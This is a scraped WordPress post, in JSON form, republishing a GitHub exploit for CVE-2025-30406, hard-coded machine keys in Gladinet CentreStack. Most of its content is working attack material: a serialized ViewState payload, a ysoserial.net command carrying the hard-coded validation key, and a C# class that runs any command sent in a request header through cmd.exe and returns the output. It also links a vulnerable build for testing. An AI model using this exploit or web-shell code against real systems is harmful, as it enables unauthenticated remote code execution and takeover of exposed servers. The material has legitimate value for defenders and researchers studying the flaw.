{"id":1373,"date":"2025-04-24T04:34:38","date_gmt":"2025-04-24T04:34:38","guid":{"rendered":"http:\/\/localhost\/?p=1373"},"modified":"2025-04-24T04:34:38","modified_gmt":"2025-04-24T04:34:38","slug":"exploit-for-use-of-hard-coded-credentials-in-gladinet-centrestack","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=1373","title":{"rendered":"Exploit for Use of Hard-coded Credentials in Gladinet Centrestack"},"content":{"rendered":"
\n

Vulnerability Details<\/h2>\n
\n

Basic Information<\/h3>\n\n\n\n\n\n\n
Title<\/th>\nExploit for Use of Hard-coded Credentials in Gladinet Centrestack<\/td>\n<\/tr>\n
Type<\/th>\ngithubexploit<\/td>\n<\/tr>\n
Published<\/th>\n2025-04-24T07:55:22<\/td>\n<\/tr>\n
Last Seen<\/th>\n2025-04-24T09:03:34<\/td>\n<\/tr>\n
CVSS Score<\/th>\n9.8 (CRITICAL)<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

CVSS v3 Details<\/h3>\n\n\n\n\n\n\n\n\n\n
Attack Vector<\/th>\nNETWORK<\/td>\n<\/tr>\n
Attack Complexity<\/th>\nLOW<\/td>\n<\/tr>\n
Privileges Required<\/th>\nNONE<\/td>\n<\/tr>\n
User Interaction<\/th>\nNONE<\/td>\n<\/tr>\n
Scope<\/th>\nUNCHANGED<\/td>\n<\/tr>\n
Confidentiality Impact<\/th>\nHIGH<\/td>\n<\/tr>\n
Integrity Impact<\/th>\nHIGH<\/td>\n<\/tr>\n
Availability Impact<\/th>\nHIGH<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

CVE Information<\/h3>\n\n\n\n\n
CVE IDs<\/th>\nCVE-2025-30406, CVE-2020-0688<\/td>\n<\/tr>\n
CWE<\/th>\n<\/td>\n<\/tr>\n
Bulletin Family<\/th>\nexploit<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

Description<\/h3>\n
\n # Part1: Exploit
\n“`powershell
\n\u03bb CVE-2025-30406.exe rce.txt
\n__LASTFOCUS=&__VIEWSTATE=%2fwEytQYAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAwCAAAAXk1pY3Jvc29mdC5Qb3dlclNoZWxsLkVkaXRvciwgVmVyc2lvbj0zLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTMxYmYzODU2YWQzNjRlMzUFAQAAAEJNaWNyb3NvZnQuVmlzdWFsU3R1ZGlvLlRleHQuRm9ybWF0dGluZy5UZXh0Rm9ybWF0dGluZ1J1blByb3BlcnRpZXMBAAAAD0ZvcmVncm91bmRCcnVzaAECAAAABgMAAADXBDxSZXNvdXJjZURpY3Rpb25hcnkgeG1sbnM9Imh0dHA6Ly9zY2hlbWFzLm1pY3Jvc29mdC5jb20vd2luZngvMjAwNi94YW1sL3ByZXNlbnRhdGlvbiIgDQogICAgeG1sbnM6eD0iaHR0cDovL3NjaGVtYXMubWljcm9zb2Z0LmNvbS93aW5meC8yMDA2L3hhbWwiDQogIHhtbG5zOlN5c3RlbT0iY2xyLW5hbWVzcGFjZTpTeXN0ZW07YXNzZW1ibHk9bXNjb3JsaWIiIA0KICAgIHhtbG5zOkRpYWc9ImNsci1uYW1lc3BhY2U6U3lzdGVtLkRpYWdub3N0aWNzO2Fzc2VtYmx5PXN5c3RlbSI%2bDQogICAgIDxPYmplY3REYXRhUHJvdmlkZXIgeDpLZXk9IiIgT2JqZWN0VHlwZT0ie3g6VHlwZSBEaWFnOlByb2Nlc3N9IiBNZXRob2ROYW1lPSJTdGFydCIgPg0KICAgICA8T2JqZWN0RGF0YVByb3ZpZGVyLk1ldGhvZFBhcmFtZXRlcnM%2bDQogICAgICAgIDxTeXN0ZW06U3RyaW5nPmNtZDwvU3lzdGVtOlN0cmluZz4NCiAgICAgICAgPFN5c3RlbTpTdHJpbmc%2bIi9jIG1zcGFpbnQiPC9TeXN0ZW06U3RyaW5nPg0KICAgICA8L09iamVjdERhdGFQcm92aWRlci5NZXRob2RQYXJhbWV0ZXJzPg0KICAgIDwvT2JqZWN0RGF0YVByb3ZpZGVyPg0KPC9SZXNvdXJjZURpY3Rpb25hcnk%2bCw%2b6OKTmIbKTjW1wQMhlIOL9OQNSS8Y3iATUxLBZnYed
\n“`<\/p>\n

Test on 16.1.10296.56315, download link:<\/p>\n

>https:\/\/s3.amazonaws.com\/gladinetsupport\/16.1.10296.56315\/gladinet\/GCE10296.iso<\/p>\n

![](https:\/\/github.com\/user-attachments\/assets\/84e201ba-1a6b-4ae0-b39d-36ff94f6e497)<\/p>\n

ysoserial.net command:<\/p>\n

“`powershell
\nysoserial.exe -p ViewState -g ActivitySurrogateSelectorFromFile –path=”\/portal\/loginpage.aspx” –apppath=”\/portal\/” –validationalg=”HMACSHA256″ –validationkey=”5496832242CC3228E292EEFFCDA089149D789E0C4D7C1A5D02BC542F7C6279BE9DD770C9EDD5D67C66B7E621411D3E57EA181BBF89FD21957DCDDFACFD926E16″ -c “ExploitClass.cs;System.Web.dll;System.dll;” –islegacy
\n“`<\/p>\n

“`c#
\nclass E
\n{
\n public E()
\n {
\n System.Web.HttpContext context = System.Web.HttpContext.Current;
\n context.Server.ClearError();
\n context.Response.Clear();
\n try
\n {
\n System.Diagnostics.Process process = new System.Diagnostics.Process();
\n process.StartInfo.FileName = “cmd.exe”;
\n string cmd = context.Request.Headers[“cmd”];
\n process.StartInfo.Arguments = “\/c ” + cmd;
\n process.StartInfo.RedirectStandardOutput = true;
\n process.StartInfo.RedirectStandardError = true;
\n process.StartInfo.UseShellExecute = false;
\n process.Start();
\n string output = process.StandardOutput.ReadToEnd();
\n context.Response.Write(output);
\n } catch (System.Exception) {}
\n context.Response.Flush();
\n context.Response.End();
\n }
\n}
\n“`<\/p>\n

![](https:\/\/github.com\/user-attachments\/assets\/103625d4-41a1-4495-9df2-e49a9b1791a1)
\n# Part2: Credit
\nhttps:\/\/www.huntress.com\/blog\/cve-2025-30406-critical-gladinet-centrestack-triofox-vulnerability-exploited-in-the-wild
\nhttps:\/\/github.com\/zcgonvh\/CVE-2020-0688
\nhttps:\/\/x.com\/_JohnHammond\/status\/1910997121639321866
\nhttps:\/\/github.com\/projectdiscovery\/nuclei-templates\/blob\/main\/http\/cves\/2025\/CVE-2025-30406.yaml<\/p><\/div>\n<\/p><\/div>\n

\n

Impact Assessment<\/h3>\n\n\n\n
Base Score<\/th>\n9.8<\/td>\n<\/tr>\n
Severity<\/th>\nCRITICAL<\/td>\n<\/tr>\n<\/table><\/div>\n
\n

View full CVE details<\/a><\/p>\n<\/p><\/div>\n<\/div>\n